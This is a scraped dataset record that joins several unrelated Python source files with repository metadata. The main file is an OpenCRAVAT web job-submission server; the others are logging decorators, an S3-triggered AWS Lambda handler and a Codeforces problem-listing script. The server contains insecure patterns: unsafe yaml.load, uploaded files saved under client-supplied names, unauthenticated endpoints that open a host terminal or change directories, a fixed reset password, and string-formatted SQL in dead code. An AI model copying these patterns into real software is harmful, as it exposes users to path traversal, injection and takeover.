                    # SECURITY NOTE: yaml.load without an explicit Loader can
                    # construct arbitrary objects.  These files are written by
                    # this application, but yaml.safe_load would be safer.
                    statusjson = yaml.load(f)
        return job_dir, statusjson

    async def job_log (self, request, job_id):
        """Path of the job's log file, or None if it does not exist."""
        orig_input_path = await self.job_input(request, job_id)
        if orig_input_path is not None:
            log_path = orig_input_path + '.log'
            if os.path.exists(log_path) == False:
                log_path = None
        else:
            log_path = None
        if log_path != None:
            return log_path
        else:
            return None
class WebJob(object):
    """In-memory record of one submitted job, backed by its status file."""

    def __init__(self, job_dir, job_status_fpath):
        self.job_dir = job_dir
        self.job_status_fpath = job_status_fpath
        # The job id is simply the name of the job directory.
        self.info = {'id': os.path.basename(job_dir)}

    def save_job_options (self, job_options):
        """Record the submitted job options in the info dict."""
        self.set_values(**job_options)

    def read_info_file(self):
        """Merge the on-disk status yaml into the in-memory info dict."""
        with open(self.job_status_fpath) as f:
            info_dict = yaml.load(f)
        if info_dict != None:
            self.set_values(**info_dict)

    def set_info_values(self, **kwargs):
        self.set_values(**kwargs)

    def get_info_dict(self):
        return self.info

    def set_values(self, **kwargs):
        self.info.update(kwargs)
def get_next_job_id():
    """Timestamp-based job id, e.g. '230101-120000' (yyMMdd-HHmmss)."""
    now = datetime.datetime.now()
    return now.strftime('%y%m%d-%H%M%S')
async def submit (request):
    """
    Handle a job submission: save the uploaded input file(s), record job
    metadata, and launch the cravat pipeline as a subprocess.
    Responds with the job's info dict as JSON.
    """
    global filerouter
    job_id = get_next_job_id()
    jobs_dir = await filerouter.get_jobs_dir(request)
    job_dir = os.path.join(jobs_dir, job_id)
    os.makedirs(job_dir, exist_ok=True)
    reader = await request.multipart()
    input_file = None
    job_options = None
    input_files = []
    # Multipart parts named 'file_*' are input files; the 'options' part
    # carries the job options JSON.
    while True:
        part = await reader.next()
        if not part:
            break
        if part.name.startswith('file_'):
            input_files.append(part)
            # Have to write to disk here
            wfname = part.filename
            wpath = os.path.join(job_dir, wfname)
            with open(wpath,'wb') as wf:
                wf.write(await part.read())
        elif part.name == 'options':
            job_options = await part.json()
    input_fnames = [fp.filename for fp in input_files]
    # NOTE(review): if no 'file_' parts arrive, orig_input_fname is never
    # assigned and the format() below raises NameError — confirm the
    # client always sends at least one file.
    if len(input_fnames) == 1:
        orig_input_fname = input_fnames[0]
    elif len(input_fnames) > 1:
        orig_input_fname = ', '.join([os.path.basename(x) for x in input_fnames])
    info_fname = '{}.status.json'.format(orig_input_fname)
    job_info_fpath = os.path.join(job_dir, info_fname)
    job = WebJob(job_dir, job_info_fpath)
    job.save_job_options(job_options)
    job.set_info_values(
        orig_input_fname=orig_input_fname,
        orig_input_files=input_fnames,
        submission_time=datetime.datetime.now().isoformat(),
        viewable=False
        )
    # Subprocess arguments
    # Estimate the runtime from the total input line count so the UI can
    # show progress expectations.
    input_fpaths = [os.path.join(job_dir, fn) for fn in input_fnames]
    tot_lines = 0
    for fpath in input_fpaths:
        with open(fpath) as f:
            tot_lines += count_lines(f)
    expected_runtime = get_expected_runtime(tot_lines, job_options['annotators'])
    job.set_info_values(expected_runtime=expected_runtime)
    run_args = ['cravat']
    for fn in input_fnames:
        run_args.append(os.path.join(job_dir, fn))
    # Annotators
    if len(job_options['annotators']) > 0:
        run_args.append('-a')
        run_args.extend(job_options['annotators'])
    else:
        run_args.append('--sa')
        run_args.append('-e')
        run_args.append('*')
    # Liftover assembly
    run_args.append('-l')
    run_args.append(job_options['assembly'])
    # Reports
    if len(job_options['reports']) > 0:
        run_args.append('-t')
        run_args.extend(job_options['reports'])
    else:
        run_args.append('--sr')
    # Note
    if 'note' in job_options:
        run_args.append('--note')
        run_args.append(job_options['note'])
    # Forced input format
    if 'forcedinputformat' in job_options:
        run_args.append('--forcedinputformat')
        run_args.append(job_options['forcedinputformat'])
    # Fire-and-forget: the pipeline updates the status file itself.
    p = subprocess.Popen(run_args)
    status = {'status': 'Submitted'}
    job.set_info_values(status=status)
    # admin.sqlite
    # if servermode:
    #     root_jobs_dir = au.get_jobs_dir()
    #     admin_db_path = os.path.join(root_jobs_dir, 'admin.sqlite')
    #     db = await aiosqlite3.connect(admin_db_path)
    #     cursor = await db.cursor()
    #     '''
    #     session = await get_session(request)
    #     username = session['username']
    #     '''
    #     username = 'default'
    #     await cursor.execute('insert into jobs values ("{}", "{}", "{}", {}, {}, "{}", "{}")'.format(job_id, username, job.get_info_dict()['submission_time'], -1, -1, '', job_options['assembly']))
    #     await db.commit()
    #     cursor.close()
    #     db.close()
    return web.json_response(job.get_info_dict())
def count_lines(f):
    """Count the lines remaining in an open file-like object."""
    return sum(1 for _ in f)
def get_expected_runtime(num_lines, annotators):
    """
    Rough runtime estimate (seconds) from empirical variants-per-second
    rates for the mapper, each annotator, and the aggregator.
    """
    mapper_vps = 1000
    annot_vps = 5000
    agg_vps = 8000
    per_line = 1 / mapper_vps + len(annotators) / annot_vps + 1 / agg_vps
    return num_lines * per_line
def get_annotators(request):
    """JSON summary of locally installed annotator modules."""
    out = {}
    for local_info in au.get_local_module_infos(types=['annotator']):
        # Defensive re-check of the module type before exposing it.
        if local_info.type != 'annotator':
            continue
        out[local_info.name] = {
            'name': local_info.name,
            'version': local_info.version,
            'type': local_info.type,
            'title': local_info.title,
            'description': local_info.description,
            'developer': local_info.developer
        }
    return web.json_response(out)
def find_files_by_ending (d, ending):
    """List the entries of directory `d` whose names end with `ending`."""
    return [fn for fn in os.listdir(d) if fn.endswith(ending)]
async def get_all_jobs (request):
    """
    List all jobs for the current user, newest first, as JSON.

    Jobs whose directories are malformed are skipped best-effort: the
    traceback is printed and iteration continues.
    """
    global filerouter
    jobs_dir = await filerouter.get_jobs_dir(request)
    if jobs_dir == None:
        return web.json_response([])
    if os.path.exists(jobs_dir) == False:
        os.mkdir(jobs_dir)
    ids = os.listdir(jobs_dir)
    ids.sort(reverse=True)
    all_jobs = []
    for job_id in ids:
        try:
            job_dir = os.path.join(jobs_dir, job_id)
            if os.path.isdir(job_dir) == False:
                continue
            # A job must have a status file to be listed.
            fns = find_files_by_ending(job_dir, '.status.json')
            if len(fns) < 1:
                continue
            status_fname = fns[0]
            status_fpath = os.path.join(job_dir, status_fname)
            job = WebJob(job_dir, status_fpath)
            job.read_info_file()
            # Merge .info.yaml values, but keep the status from the status
            # file when both define it.
            fns = find_files_by_ending(job_dir, '.info.yaml')
            if len(fns) > 0:
                info_fpath = os.path.join(job_dir, fns[0])
                with open (info_fpath) as f:
                    info_json = yaml.load('\n'.join(f.readlines()))
                for k, v in info_json.items():
                    if k == 'status' and 'status' in job.info:
                        continue
                    job.info[k] = v
            fns = find_files_by_ending(job_dir, '.sqlite')
            if len(fns) > 0:
                db_path = os.path.join(job_dir, fns[0])
            else:
                db_path = ''
            # The job becomes viewable once its result database exists.
            job_viewable = os.path.exists(db_path)
            job.set_info_values(
                viewable=job_viewable,
                db_path=db_path,
                status=job.info['status'],
            )
            # Record which report types already have a generated file.
            existing_reports = []
            for report_type in get_valid_report_types():
                ext = filerouter.report_extensions.get(report_type, '.'+report_type)
                job_input = await filerouter.job_input(request, job_id)
                if job_input is None:
                    continue
                # NOTE(review): job_input is already an absolute path, so the
                # join below resolves to it — TODO simplify.
                report_fname = job_input + ext
                report_file = os.path.join(job_dir, report_fname)
                if os.path.exists(report_file):
                    existing_reports.append(report_type)
            job.set_info_values(reports=existing_reports)
            all_jobs.append(job)
        except:
            traceback.print_exc()
            continue
    return web.json_response([job.get_info_dict() for job in all_jobs])
async def view_job(request):
    """
    Launch (or relaunch) the cravat-view process on the job's result db.
    Only one viewer process is kept; any previous one is killed first.
    Responds 404 when the database does not exist.
    """
    global VIEW_PROCESS
    global filerouter
    job_id = request.match_info['job_id']
    db_path = await filerouter.job_db(request, job_id)
    if os.path.exists(db_path):
        # isinstance instead of exact type comparison (idiomatic and
        # subclass-safe; also handles VIEW_PROCESS being None).
        if isinstance(VIEW_PROCESS, subprocess.Popen):
            VIEW_PROCESS.kill()
        VIEW_PROCESS = subprocess.Popen(['cravat-view', db_path])
        return web.Response()
    else:
        return web.Response(status=404)
async def delete_job(request):
    """Remove the job's directory tree; 404 when it does not exist."""
    global filerouter
    job_id = request.match_info['job_id']
    job_dir = await filerouter.job_dir(request, job_id)
    if not os.path.exists(job_dir):
        return web.Response(status=404)
    shutil.rmtree(job_dir)
    return web.Response()
async def download_db(request):
    """Serve the job's sqlite result database as a file download."""
    global filerouter
    job_id = request.match_info['job_id']
    db_path = await filerouter.job_db(request, job_id)
    headers = {'Content-Disposition': 'attachment; filename=' + job_id + '.sqlite'}
    return web.FileResponse(db_path, headers=headers)
async def get_job_log (request):
    """Return the job's log file contents, or an explanatory message."""
    global filerouter
    job_id = request.match_info['job_id']
    log_path = await filerouter.job_log(request, job_id)
    if log_path is not None:
        with open(log_path) as f:
            return web.Response(text=f.read())
    else:
        # Fixed typo in the user-facing message ('loo' -> 'log').
        return web.Response(text='log file does not exist.')
def get_valid_report_types():
    """Report type names derived from installed *reporter modules."""
    infos = au.get_local_module_infos(types=['reporter'])
    return [info.name.split('reporter')[0] for info in infos]
def get_report_types(request):
    """JSON of the valid report types plus the configured default type."""
    cfl = ConfigLoader()
    default_reporter = cfl.get_cravat_conf_value('reporter')
    default_type = default_reporter.split('reporter')[0]
    payload = {'valid': get_valid_report_types(), 'default': default_type}
    return web.json_response(payload)
async def generate_report(request):
    """
    Run the cravat reporter for one job and report type.

    NOTE(review): Popen(...).wait() blocks the event loop for the whole
    report run; consider asyncio subprocesses.
    """
    global filerouter
    job_id = request.match_info['job_id']
    report_type = request.match_info['report_type']
    if report_type in get_valid_report_types():
        job_input = await filerouter.job_input(request, job_id)
        cmd_args = ['cravat', job_input, '--str', '-t', report_type]
        p = subprocess.Popen(cmd_args)
        p.wait()
    return web.Response()
async def download_report(request):
    """Serve a generated report file as a download named after the job."""
    global filerouter
    job_id = request.match_info['job_id']
    report_type = request.match_info['report_type']
    report_path = await filerouter.job_report(request, job_id, report_type)
    suffix = report_path.split('.')[-1]
    headers = {'Content-Disposition':'attachment; filename=' + job_id + '.' + suffix}
    return web.FileResponse(report_path, headers=headers)
def get_jobs_dir (request):
    """JSON of the configured root jobs directory."""
    return web.json_response(au.get_jobs_dir())
def set_jobs_dir (request):
    """Set the root jobs directory from the 'jobsdir' query parameter."""
    new_dir = request.rel_url.query['jobsdir']
    au.set_jobs_dir(new_dir)
    return web.json_response(new_dir)
async def get_system_conf_info (request):
    """JSON description of the current system configuration."""
    return web.json_response(au.get_system_conf_info_json())
async def update_system_conf (request):
    """
    Apply a new system configuration from the 'sysconf' query parameter.

    On failure, report success=False with an empty sysconf.  (The original
    re-raised inside the except block, which made this fallback dead code
    and crashed the handler instead.)
    """
    queries = request.rel_url.query
    sysconf = json.loads(queries['sysconf'])
    try:
        success = au.update_system_conf_file(sysconf)
    except Exception:
        sysconf = {}
        success = False
    return web.json_response({'success': success, 'sysconf': sysconf})
def reset_system_conf (request):
    """
    Rewrite the system conf from its template, preserving the configured
    modules and jobs directories.
    """
    conf = au.read_system_conf_template()
    conf['modules_dir'] = au.get_modules_dir()
    conf['jobs_dir'] = au.get_jobs_dir()
    au.write_system_conf_file(conf)
    return web.json_response({'status':'success', 'dict':yaml.dump(conf)})
async def create_user_dir (request, username):
    """Ensure the per-user jobs directory exists."""
    global filerouter
    jobs_dir = await filerouter.get_jobs_dir(request)
    if not os.path.exists(jobs_dir):
        os.mkdir(jobs_dir)
async def signup (request):
    """
    Register a new user (email, password hash, recovery question/answer).

    SECURITY FIX: uses parameterized SQL -- the original interpolated
    request values straight into the statements (SQL injection).
    """
    queries = request.rel_url.query
    username = queries['username']
    password = queries['password']
    m = hashlib.sha256()
    m.update(password.encode('utf-16be'))
    passwordhash = m.hexdigest()
    question = queries['question']
    answer = queries['answer']
    m = hashlib.sha256()
    m.update(answer.encode('utf-16be'))
    answerhash = m.hexdigest()
    root_jobs_dir = au.get_jobs_dir()
    admin_db_path = os.path.join(root_jobs_dir, 'admin.sqlite')
    db = await aiosqlite3.connect(admin_db_path)
    cursor = await db.cursor()
    await cursor.execute('select * from users where email=?', (username,))
    r = await cursor.fetchone()
    if r is not None:
        # Close the connection on the early-return path too (the original
        # leaked it).
        await cursor.close()
        await db.close()
        return web.json_response('already registered')
    await cursor.execute('insert into users values (?, ?, ?, ?)',
                         (username, passwordhash, question, answerhash))
    await db.commit()
    await cursor.close()
    await db.close()
    await create_user_dir(request, username)
    return web.json_response('success')
async def login (request):
    """
    Check user credentials; responds 'success' or 'fail' as JSON.

    SECURITY FIX: uses parameterized SQL -- the original interpolated
    request values straight into the statement (SQL injection).
    """
    queries = request.rel_url.query
    username = queries['username']
    password = queries['password']
    m = hashlib.sha256()
    m.update(password.encode('utf-16be'))
    passwordhash = m.hexdigest()
    root_jobs_dir = au.get_jobs_dir()
    admin_db_path = os.path.join(root_jobs_dir, 'admin.sqlite')
    db = await aiosqlite3.connect(admin_db_path)
    cursor = await db.cursor()
    await cursor.execute('select * from users where email=? and passwordhash=?',
                         (username, passwordhash))
    r = await cursor.fetchone()
    if r is not None:
        response = 'success'
        await create_user_dir(request, username)
    else:
        response = 'fail'
    await cursor.close()
    await db.close()
    return web.json_response(response)
async def get_password_question (request):
    """
    Return the password-recovery question for an email.

    SECURITY FIX: uses parameterized SQL -- the original interpolated the
    email straight into the statement (SQL injection).
    """
    queries = request.rel_url.query
    email = queries['email']
    root_jobs_dir = au.get_jobs_dir()
    admin_db_path = os.path.join(root_jobs_dir, 'admin.sqlite')
    db = await aiosqlite3.connect(admin_db_path)
    cursor = await db.cursor()
    await cursor.execute('select question from users where email=?', (email,))
    r = await cursor.fetchone()
    if r is None:
        # Close the connection on the failure path too (the original
        # leaked it).
        await cursor.close()
        await db.close()
        return web.json_response({'status':'fail', 'msg':'No such email'})
    question = r[0]
    await cursor.close()
    await db.close()
    return web.json_response({'status':'success', 'msg':question})
async def check_password_answer (request):
    """Check a password-recovery answer and, on success, reset the user's
    password to a fixed temporary value.

    Query params: ``email``, ``answer``.  The answer is hashed the same
    way passwords are (SHA-256 over UTF-16BE).  Returns the temporary
    password in the JSON body on success.
    """
    #session = await get_session(request)
    queries = request.rel_url.query
    email = queries['email']
    answer = queries['answer']
    m = hashlib.sha256()
    m.update(answer.encode('utf-16be'))
    answerhash = m.hexdigest()
    root_jobs_dir = au.get_jobs_dir()
    admin_db_path = os.path.join(root_jobs_dir, 'admin.sqlite')
    db = await aiosqlite3.connect(admin_db_path)
    cursor = await db.cursor()
    # Parameterized queries: the previous str.format interpolation was an
    # SQL-injection vector for attacker-controlled input.
    await cursor.execute(
        'select * from users where email=? and answerhash=?',
        (email, answerhash))
    r = await cursor.fetchone()
    if r is not None:
        temppassword = 'open_cravat_temp_password'
        m = hashlib.sha256()
        m.update(temppassword.encode('utf-16be'))
        temppasswordhash = m.hexdigest()
        await cursor.execute(
            'update users set passwordhash=? where email=?',
            (temppasswordhash, email))
        await db.commit()
        await cursor.close()
        await db.close()
        return web.json_response({'success': True, 'msg': temppassword})
    else:
        await cursor.close()
        await db.close()
        return web.json_response({'success': False, 'msg': 'Wrong answer'})
async def change_password (request):
    """Change the password of the (hard-coded 'default') user.

    Verifies ``oldpassword`` against the stored hash, then stores the
    SHA-256/UTF-16BE hash of ``newpassword``.  Returns 'success' or an
    authentication-failure message as JSON.
    """
    '''
    session = await get_session(request)
    email = session['username']
    '''
    email = 'default'
    root_jobs_dir = au.get_jobs_dir()
    admin_db_path = os.path.join(root_jobs_dir, 'admin.sqlite')
    db = await aiosqlite3.connect(admin_db_path)
    cursor = await db.cursor()
    queries = request.rel_url.query
    oldpassword = queries['oldpassword']
    newpassword = queries['newpassword']
    m = hashlib.sha256()
    m.update(oldpassword.encode('utf-16be'))
    oldpasswordhash = m.hexdigest()
    # Parameterized queries: the previous str.format interpolation was an
    # SQL-injection vector for attacker-controlled input.
    await cursor.execute(
        'select * from users where email=? and passwordhash=?',
        (email, oldpasswordhash))
    r = await cursor.fetchone()
    if r is None:
        await cursor.close()
        await db.close()
        return web.json_response('User authentication failed.')
    else:
        m = hashlib.sha256()
        m.update(newpassword.encode('utf-16be'))
        newpasswordhash = m.hexdigest()
        await cursor.execute(
            'update users set passwordhash=? where email=?',
            (newpasswordhash, email))
        await db.commit()
        await cursor.close()
        await db.close()
        return web.json_response('success')
async def check_logged (request):
    """Report login status; sessions are disabled, so always logged out."""
    # Disabled session-based lookup, kept for reference:
    #   session = await get_session(request)
    #   username = session['username']
    #   logged = session['logged']
    username = 'default'
    logged = False
    if logged:
        payload = {'logged': True, 'email': username}
    else:
        payload = {'logged': False, 'email': ''}
    return web.json_response(payload)
async def logout (request):
    """Log the user out.  Sessions are disabled, so this is a no-op that
    always reports success."""
    '''
    session = await new_session(request)
    session['username'] = None
    '''
    return web.json_response('success')
    # NOTE(review): everything below the return is unreachable dead code
    # left over from the session-based implementation.
    '''
    username = session['username']
    root_jobs_dir = au.get_jobs_dir()
    admin_db_path = os.path.join(root_jobs_dir, 'admin.sqlite')
    db = await aiosqlite3.connect(admin_db_path)
    cursor = await db.cursor()
    await cursor.execute('select * from users where email="{}" and passwordhash="{}"'.format(username, passwordhash))
    r = await cursor.fetchone()
    if r is not None:
        response = 'success'
        session['username'] = username
        session['logged'] = True
        await create_user_dir(request, username)
    else:
        response = 'fail'
    await cursor.close()
    await db.close()
    return web.json_response(response)
    '''
def get_servermode (request):
    """Report whether the server runs in multi-user (server) mode.

    Server mode is hard-wired off in this build.
    """
    return web.json_response({'servermode': False})
async def get_package_versions(request):
    """Return the installed and latest package versions and whether an
    update is available, as JSON."""
    cur_ver = au.get_current_package_version()
    lat_ver = au.get_latest_package_version()
    # LooseVersion compares dotted version strings component-wise.
    update = LooseVersion(lat_ver) > LooseVersion(cur_ver)
    d = {
        'current': cur_ver,
        'latest': lat_ver,
        'update': update
    }
    return web.json_response(d)
def open_terminal (request):
    """Open a native terminal window on the host (Windows, macOS, or WSL).

    On unsupported platforms (plain Linux, anything else) it returns None
    without a JSON body; otherwise responds with 'done'.
    """
    filedir = os.path.dirname(os.path.abspath(__file__))
    python_dir = os.path.dirname(sys.executable)
    p = sys.platform
    if p.startswith('win'):
        cmd = {'cmd': ['start', 'cmd'], 'shell': True}
    elif p.startswith('darwin'):
        # AppleScript: open Terminal with this Python on PATH.
        cmd = {'cmd': '''
            osascript -e 'tell app "Terminal"
            do script "export PATH=''' + python_dir + ''':$PATH"
            do script "echo Welcome to OpenCRAVAT" in window 1
            end tell'
            ''', 'shell': True}
    elif p.startswith('linux'):
        p2 = platform.platform()
        # Only Windows Subsystem for Linux is supported on the linux branch.
        if p2.startswith('Linux') and 'Microsoft' in p2:
            cmd = {'cmd': ['ubuntu1804.exe'], 'shell': True}
        else:
            return
    else:
        return
    subprocess.call(cmd['cmd'], shell=cmd['shell'])
    response = 'done'
    return web.json_response(response)
# Module-level wiring: shared file router and the URL -> handler table.
filerouter = FileRouter()
VIEW_PROCESS = None
# Each entry is [HTTP method, URL path, handler]; consumed below (and by
# the embedding server when this module is imported).
routes = []
routes.append(['POST','/submit/submit',submit])
routes.append(['GET','/submit/annotators',get_annotators])
routes.append(['GET','/submit/jobs',get_all_jobs])
routes.append(['GET','/submit/jobs/{job_id}',view_job])
routes.append(['DELETE','/submit/jobs/{job_id}',delete_job])
routes.append(['GET','/submit/jobs/{job_id}/db', download_db])
routes.append(['GET','/submit/reports',get_report_types])
routes.append(['POST','/submit/jobs/{job_id}/reports/{report_type}',generate_report])
routes.append(['GET','/submit/jobs/{job_id}/reports/{report_type}',download_report])
routes.append(['GET','/submit/jobs/{job_id}/log',get_job_log])
routes.append(['GET', '/submit/getjobsdir', get_jobs_dir])
routes.append(['GET', '/submit/setjobsdir', set_jobs_dir])
routes.append(['GET', '/submit/getsystemconfinfo', get_system_conf_info])
routes.append(['GET', '/submit/updatesystemconf', update_system_conf])
routes.append(['GET', '/submit/resetsystemconf', reset_system_conf])
routes.append(['GET', '/submit/login', login])
routes.append(['GET', '/submit/servermode', get_servermode])
routes.append(['GET', '/submit/signup', signup])
routes.append(['GET', '/submit/logout', logout])
routes.append(['GET', '/submit/passwordquestion', get_password_question])
routes.append(['GET', '/submit/passwordanswer', check_password_answer])
routes.append(['GET', '/submit/changepassword', change_password])
routes.append(['GET', '/submit/checklogged', check_logged])
routes.append(['GET', '/submit/packageversions', get_package_versions])
routes.append(['GET', '/submit/openterminal', open_terminal])
# Standalone mode: build an aiohttp app from the routes table and serve it.
if __name__ == '__main__':
    app = web.Application()
    for route in routes:
        method, path, func_name = route
        app.router.add_route(method, path, func_name)
    web.run_app(app, port=8060)
| pevs/open-cravat | cravat/websubmit/websubmit.py | websubmit.py | py | 26,894 | python | en | code | null | github-code | 1 | [
{
"api_name": "os.path.dirname",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name": "cravat.admin_util.get_jobs_dir",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "cravat.ad... |
935555272 | import functools
import logging
import time
def validate_command(command):
    """Decorator factory that gates a handler on its command letter.

    The wrapped function runs only when it receives at least two
    positional arguments and the second one (the io_line) starts with
    *command*; otherwise a debug message is logged and None is returned.
    """
    def actual_decorator(func):
        @functools.wraps(func)
        def wrapper(*args, **kwargs):
            if len(args) >= 2:
                received = args[1][0]
                if received == command:
                    return func(*args, **kwargs)
                logging.debug(
                    f"{func.__name__} Error: Got {received}, expecting command {command}"
                )
            else:
                logging.debug(f"{func.__name__} Error: not enough arguments")
            return None
        return wrapper
    return actual_decorator
def log_command(func):
    """Decorator that logs the command letter and wall-clock duration (ms)
    of each invocation in CSV format (``<letter>,<ms>``).

    The wrapped function must receive the io_line — a non-empty sequence
    whose first element is the command letter — as its second positional
    argument; otherwise a debug message is logged and None is returned.
    """
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        # Bug fix: the original guard was `len(args) < 2 and len(args[1]) < 0`,
        # so a missing io_line raised IndexError (args[1] evaluated inside the
        # short-circuit) and an empty io_line crashed later on args[1][0].
        if len(args) < 2 or len(args[1]) == 0:
            logging.debug(f"{func.__name__} Error: not enough arguments")
            return
        command_letter = args[1][0]
        logging.debug(f"\n -------> {','.join(args[1])}")
        before = time.time()
        command = func(*args, **kwargs)
        after = time.time()
        time_taken = round((after - before) * 1000, 2)
        # In CSV Format
        logging.info(f"{command_letter},{time_taken}")
        return command
    return wrapper
| CS4224-Claps/project | cockroachdb/utils/decorators.py | decorators.py | py | 1,236 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "logging.debug",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "logging.debug",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "functools.wraps",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "logging.debug",
"line_... |
24758047234 | import boto3
import logging
import os
import json
# AWS clients and configuration live at module level so Lambda reuses
# them across warm invocations.
dynamodb_client = boto3.client('dynamodb', region_name="us-east-1")
sns_client = boto3.client('sns', region_name="us-east-1")
# Target table; overridable via the CUSTOMERS_TABLE environment variable.
CUSTOMERS_TABLE_NAME = os.getenv('CUSTOMERS_TABLE', "functions_table")
SNS_TOPIC_ARN_FUNCTION_MODIFIED = "function_modified"
# Feature flag: publish an SNS notification for every new customer file.
with_sns_msg = True
def notify_new_customer(key):
    """Publish an SNS message announcing a newly uploaded customer file.

    key: S3 object key of the new customer file.
    """
    message = {
        'newCustomer': key,
    }
    # NOTE(review): TopicArn is a bare topic name, not a full ARN —
    # confirm the target endpoint accepts this form.
    sns_client.publish(TopicArn=SNS_TOPIC_ARN_FUNCTION_MODIFIED, Message=json.dumps(message))
    logging.info('sns message published')
def lambda_handler(event, context):
    """AWS Lambda entry point for S3 object-created events.

    For every S3 record, stores the object key in the customers DynamoDB
    table and, when the flag is set, publishes an SNS notification.
    Returns the incoming event unchanged.
    """
    # This lambda will handle new user files uploaded to the customer s3 bucket
    for record in event['Records']:
        bucket = record['s3']['bucket']['name']
        key = record['s3']['object']['key']
        logging.debug("Got a new customer file")
        # NOTE(review): the low-level DynamoDB client normally requires
        # typed attribute values ({'S': key}) — confirm this plain string
        # form works against the target endpoint.
        dynamodb_client.put_item(TableName=CUSTOMERS_TABLE_NAME, Item={"key": key})
        if with_sns_msg:
            notify_new_customer(key)
    return event
# if __name__ == "__main__":
# lambda_namdler({})
| dome9/protego-examples | proact/inputs/python_new_file_handler/python_new_file_handler.py | python_new_file_handler.py | py | 1,058 | python | en | code | 4 | github-code | 1 | [
{
"api_name": "boto3.client",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "boto3.client",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "os.getenv",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "json.dumps",
"line_number": 19,
... |
17890730091 | import sys
import os
from rich.pretty import pprint
from urllib.parse import quote_plus
from rich.table import Table
from rich.console import Console
from rich.prompt import IntPrompt, Prompt, Confirm
sys.path.append(os.path.dirname(os.path.realpath(__file__)) + "/../..")
from lib.submissions import get_submissions, get_submissions_for_contest
from lib.contests import get_contest_map, get_contest_number
from lib.problems import get_problems
# printer.PRINT=set_status
def get_table():
    """Build the empty rich Table (titles, columns, ratios) that the
    problem rows are appended to."""
    table=Table(
        title="List of codeforces problems",
        title_style="on_default",
        show_lines=True,
        highlight=True,
        expand=True,
    )
    # Column ratios control relative widths when the table expands.
    table.add_column("contest name", ratio=4)
    table.add_column("contest id", ratio=1)
    table.add_column("problem name", ratio=3)
    table.add_column("problem id", ratio=1)
    table.add_column("problem rating", ratio=1)
    table.add_column("url", ratio=7)
    return table
def add_row(table, data, contest_mp):
    """Append one problem row to the rich table.

    data: a problem dict from the Codeforces API.
    contest_mp: mapping of contest id -> contest metadata.
    Missing fields (no contest id, no rating) render as empty cells.
    """
    cid = None
    if "contestId" in data: cid = data["contestId"]
    cname = None
    if cid is not None: cname = contest_mp[cid]["name"]
    pname = data["name"]
    pid = data["index"]
    rating = None
    if "rating" in data: rating = data["rating"]
    url = None
    if cid is not None:
        # quote_plus guards against unexpected characters in the ids.
        url = "https://codeforces.com/contest/{}/problem/{}".format(
            quote_plus(str(cid)),
            quote_plus(pid),
        )
    # Normalize every missing value to an empty cell.
    if cname is None: cname = ""
    if cid is None: cid = ""
    if pname is None: pname = ""
    if pid is None: pid = ""
    if rating is None: rating = ""
    if url is None: url = ""
    table.add_row(cname, str(cid), pname, pid, str(rating), url)
def get_unsolved_problems_from_participated_contests(handle):
    """Return every problem (newest first) from contests *handle* entered
    that the user has not solved.

    Div1/Div2 twin contests share problems but have adjacent ids: when
    the contest number parsed from the name matches for id-1 or id+1,
    both ids are treated as participated and accepted problems are
    credited to both.
    """
    submissions = get_submissions(handle)
    used_contest_ids = set()
    contest_mp = get_contest_map()
    solved_problems = set()
    for submission in submissions:
        is_ac = submission["verdict"] == "OK"
        # handle div1 and div2 having the same problems but different ids
        if "contestId" not in submission: continue
        cid = submission["contestId"]
        if is_ac:
            # Key problems by contest id + name so same-named problems in
            # different contests stay distinct.
            full_problem_name = str(cid) + submission["problem"]["name"]
            solved_problems.add(full_problem_name)
        used_contest_ids.add(cid)
        if cid not in contest_mp: continue
        cnum = get_contest_number(contest_mp[cid]["name"])
        if cid - 1 in contest_mp:
            num = get_contest_number(contest_mp[cid - 1]["name"])
            if num is not None and cnum == num:
                used_contest_ids.add(cid - 1)
                if is_ac:
                    full_problem_name = str(cid - 1) + submission["problem"]["name"]
                    solved_problems.add(full_problem_name)
        if cid + 1 in contest_mp:
            num = get_contest_number(contest_mp[cid + 1]["name"])
            if num is not None and cnum == num:
                used_contest_ids.add(cid + 1)
                if is_ac:
                    full_problem_name = str(cid + 1) + submission["problem"]["name"]
                    solved_problems.add(full_problem_name)
    all_problems = get_problems()
    problems = []
    for problem in all_problems:
        is_problem_ok = False
        if "contestId" not in problem:
            # Problems without a contest id are always kept.
            is_problem_ok = True
        else:
            cid = problem["contestId"]
            full_problem_name = str(cid) + problem["name"]
            if cid in used_contest_ids and full_problem_name not in solved_problems:
                is_problem_ok = True
        if is_problem_ok:
            problems.append(problem)
    problems = problems[::-1] # reverse
    return problems
def filter_by_rating(problems, rmin, rmax):
    """Lazily yield only the problems whose rating is present and lies in
    [rmin, rmax], inclusive on both ends."""
    def _in_range(problem):
        if "rating" not in problem:
            return False
        return rmin <= problem["rating"] <= rmax
    return filter(_in_range, problems)
def main():
    """Interactive entry point: ask for a handle and an optional rating
    range, then print the table of unsolved problems from contests the
    user participated in."""
    handle = Prompt.ask("CodeForces handle")
    should_filter_by_rating = Confirm.ask(
        "Filter by rating",
        default=False,
    )
    rmin = None
    rmax = None
    if should_filter_by_rating:
        # The explicit choice lists constrain input to integers in range
        # (and rmax to be >= rmin) without printing the huge list.
        rmin = IntPrompt.ask(
            "Minimum rating",
            choices=list(map(str, range(0,10000))),
            show_choices=False
        )
        rmax = IntPrompt.ask(
            "Maximum rating",
            choices=list(map(str, range(rmin,10000))),
            show_choices=False
        )
    problems = get_unsolved_problems_from_participated_contests(handle)
    if should_filter_by_rating:
        problems = filter_by_rating(problems, rmin, rmax)
    contest_mp = get_contest_map()
    table = get_table()
    for problem in problems:
        add_row(table, problem, contest_mp)
    console = Console()
    console.print(table)
if __name__ == "__main__":
    # Run interactively; Ctrl-C exits with status 1, normal completion with 0.
    try:
        main()
    except KeyboardInterrupt:
        print()
        sys.exit(1)
    sys.exit(0)
| willthbill/cfscripts | src/scripts/UnsolvedContestProblems/main.py | main.py | py | 4,947 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "sys.path.append",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 10,
